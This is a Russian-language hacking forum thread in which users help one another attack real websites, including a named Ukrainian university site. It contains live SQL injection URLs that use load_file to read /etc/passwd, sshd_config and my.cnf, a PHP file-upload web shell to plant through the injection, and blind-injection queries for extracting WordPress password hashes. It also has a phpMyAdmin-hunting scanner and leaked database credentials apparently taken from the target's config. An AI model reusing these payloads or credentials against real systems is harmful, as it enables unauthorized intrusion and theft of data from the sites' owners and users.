Ваши вопросы по уязвимостям.

Народ, ситуация такая:
на вордпрессе 2.0.2 нашёл sql-injection:
www.site.ru/?page_id=400&cat=-15+or+1=(select+1)/*
В ответ на это:

И версия 3-я:
www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*

Как тут можно получить пароль из wp_users?

---
Вопрос снят. Ответ - Никак

 

M1ks, если file_upload=On, то можно намного проще сделать.
Заливаешь через свою уязвимость

PHP:

<?php if($_FILES[upfile]){if(!move_uploaded_file($_FILES[upfile][tmp_name], $_FILES[upfile][name]))die();}?><form method=POST enctype=<?php echo chr(39);?>multipart/form-data<?php echo chr(39);?>><input type=file name=upfile><input type=Submit></form>


И заливаешь любой файл со своего компа

 

Strilo4ka, смотря какая ОС и как сервер настроен.

 

3 мускул ,мда редкий зверь .
без поддержки обьединения запросов посредством UNION ,+ при запросах типа SELECT,ни подзапросов

 

Code:

http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+1,load_file(0x2f6574632f7068702e696e69),3,4,5--+

используй load_file()
Далее манимулируй для полного вывода данных.

ВСЕ можна вывести через первый столбец:

Code:

http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7068702e696e69),2,3,4,5--+

 

Хотелось бы услышать ответ на мой вопрос.

 

Тут нет никакого вопроса. Ты не первый день на форуме. Статьи все в разделе СТАТЬИ, а слепые скули, конечно тебе никто собирать не будет. Поиск по теме SQL думаю поможет нарыть кучу примеров, в конце концов на локалке напиши скрипт и тренируйся, если интересно. И не обязательно искать слепые, можешь на любой пробовать, просто расскручивай её как будто вывода нет, вот и вся практика.

 

Артем, если вопрос был про and/or, то:
1. true'>if(locate(1,(substring((select+id+from+users+where+id=1),1,1))),0,1)
2. false' union select * from table where locate(...)
если про практику, то ответ в последней строчке постом выше

 

может так легче?

Code:

?php
//$server = "80.73.1.156";
$server = "localhost";
$user = "univd";
$pwd = "biohazard";
//$server = "localhost:3306";
//$user = "cardinal";
//$pwd = "cfiekz";
$con = mysql_connect($server, $user, $pwd);
mysql_select_db("univd", $con);
$maxbook = 10;
?>

 

toolza, 7 пункт главного меню, 6 метод, только гет методом, но там ничего интересного нет:

Code:

 /etc/ssh/sshd_config
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7373682f737368645f636f6e666967),2,3,4,5--+
------------------------------------
  /etc/passwd
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f706173737764),2,3,4,5--+
------------------------------------
  /etc/vsftpd.chroot_list
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7673667470642e6368726f6f745f6c697374),2,3,4,5--+
------------------------------------
  /etc/my.cnf
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f6d792e636e66),2,3,4,5--+
------------------------------------
  /etc/vsftpd.conf
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f6574632f7673667470642e636f6e66),2,3,4,5--+
------------------------------------
  /usr/bin/grep
------------------------------------
     http://www.univd.edu.ua/document/index.php?id_doc=-123+union+select+load_file(0x2f7573722f62696e2f67726570),2,3,4,5--+

а вообще там менты, так что поаккуратней

 

https://forum.antichat.ru/thread148915.html

 

прочитал : /home/snake/univd/univd/document/index.php

Code:

include ($path_pars . 'structure/tools_st.inc');

Code:

include ($path_pars .'serverdb.inc')

 

http://google.ru/

site:домен_жертвы phpmyadmin

Если админ норм, то ненайдёшь, посмотри у хостера.

 

Простенький сканер каталога phpMyAdmin

Code:

http://dumpz.org/13615/

 

+ часто бывает пхп админ прячут на нулевом домене,тут только реверс айпи поможет(как повезет)
Strilo4ka тут больше соображалка играет роль,и нормальный словарь директорий
может поможет
univd.edu.ua/dumper/dumper.php

 

Я пробую на локалке у себя, у меня всё пашет, а когда уже на удаленке, то ошибка выскакивает, хотя запрос тотже,
#1064 - You have an error in your SQL syntax near '' at line 1

Там походу офф, неработает чегото

 

Когда делаю ифрейм,на сайте появляется ошибка -Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homez.194/fromagero/www/includes/defines.php:3) in /homez.194/**/www/libraries/joomla/session/session.php on line 423

 

погоди с выводами.
таблица "wp_users" имеет поле :
user_pass(по дефолту),если найденная тобой скуля работает с таблице пользователей =>подбирай колонку с паролем пользователя, а затем и сам пароль.
колонку с паролем:

Code:

profile.php?id=2+and+length(user_pass)>0

пароль:

Code:

id=2+and+ascii(substring(user_pass,1,1))>127

^Посимвольным перебором.
вот замечательная статья Grey'a - Работа с инъекциями в MySQL третьей версии.

 

Зри конфиг пхн, наверняка у тебя на локалке magic_quotes=off, а на удаленке - ON.

 

млин, и че же делать..